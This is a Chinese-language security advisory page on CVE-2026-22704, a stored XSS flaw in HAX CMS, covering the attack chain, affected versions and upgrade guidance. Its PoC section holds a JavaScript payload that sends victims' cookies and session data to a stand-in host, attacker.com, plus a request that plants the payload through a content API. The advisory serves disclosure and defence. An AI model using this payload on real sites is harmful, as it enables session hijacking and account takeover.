CVE-2026-22704 CVSS 8.0 高危

CVE-2026-22704 HAX CMS存储型XSS漏洞可导致账户接管

披露日期: 2026-01-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22704

漏洞类型

存储型XSS

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

HAX CMS

漏洞概述

HAX CMS是一款用于管理微站点生态系统的内容管理系统，支持PHP或Node.js后端。在11.0.6至25.0.0之前的版本中存在存储型跨站脚本（Stored XSS）漏洞，攻击者可以利用该漏洞在受害者的浏览器中执行任意JavaScript代码，从而实现账户接管。攻击者需要具备低权限用户身份，并通过诱导具有更高权限的用户访问包含恶意脚本的页面来触发漏洞。由于恶意脚本会永久存储在服务器端，所有访问该内容的用户都会受到攻击影响，可能导致敏感信息泄露、会话劫持等严重安全后果。该漏洞已被修复于版本25.0.0。

技术细节

HAX CMS的存储型XSS漏洞源于系统未能对用户提交的内容进行充分的输入验证和输出编码。攻击者以低权限用户身份登录系统后，可以在内容创建或编辑功能中注入恶意JavaScript代码。该恶意代码会作为合法内容的一部分被永久存储在数据库中。当其他用户（可能是管理员）访问包含该恶意代码的页面时，浏览器会将其解析为HTML并执行其中的JavaScript脚本。攻击者可以利用此机制窃取受害者的认证Cookie、劫持用户会话、执行任意操作，甚至通过提升权限进一步控制整个系统。CVSS 3.1评分8.0（高危）反映了该漏洞通过网络可利用、需要低权限和用户交互、且对机密性、完整性和可用性均有高影响的特性。

攻击链分析

STEP 1

步骤1

攻击者获取HAX CMS低权限账户（如普通用户或贡献者账号）

STEP 2

步骤2

攻击者利用内容创建或编辑功能，在页面内容中注入包含恶意JavaScript的XSS payload

STEP 3

步骤3

恶意内容被存储到服务器数据库中，形成持久化攻击点

STEP 4

步骤4

具有更高权限的用户（如管理员）访问包含恶意代码的页面

STEP 5

步骤5

浏览器解析页面时执行恶意JavaScript，窃取用户Cookie或会话令牌

STEP 6

步骤6

攻击者利用窃取的认证信息劫持管理员账户，完全控制HAX CMS系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-22704 Stored XSS PoC for HAX CMS
// Attack requires low-privilege account, triggers when admin views the page

// Malicious payload injection via content creation/edit API
const maliciousPayload = `
<img src=x onerror="
  // Steal session cookie
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
  // Hijack session
  fetch('https://attacker.com/api/session-hijack', {
    method: 'POST',
    body: JSON.stringify({
      session: document.cookie,
      userAgent: navigator.userAgent
    })
  });
">
`;

// Example: POST request to create content with XSS payload
fetch('/api/content/create', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer [low-privilege-token]'
  },
  body: JSON.stringify({
    title: 'Malicious Content',
    body: maliciousPayload,
    format: 'html'
  })
});

// When admin views: <img src=x onerror="[malicious JS]"> executes
// Results in: account takeover, session hijacking, data theft

影响范围

HAX CMS 11.0.6 至 < 25.0.0

HAX CMS Node.js后端版本 11.0.6 至 < 25.0.0

防御指南

临时缓解措施

立即将HAX CMS升级到25.0.0或更高版本以修复该漏洞。在等待升级期间，可通过禁用用户内容提交功能、启用严格的输入过滤规则、部署WAF规则阻止XSS攻击向量，以及对现有内容进行安全扫描来降低风险。建议同时审查用户权限配置，限制低权限用户的内容发布能力。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表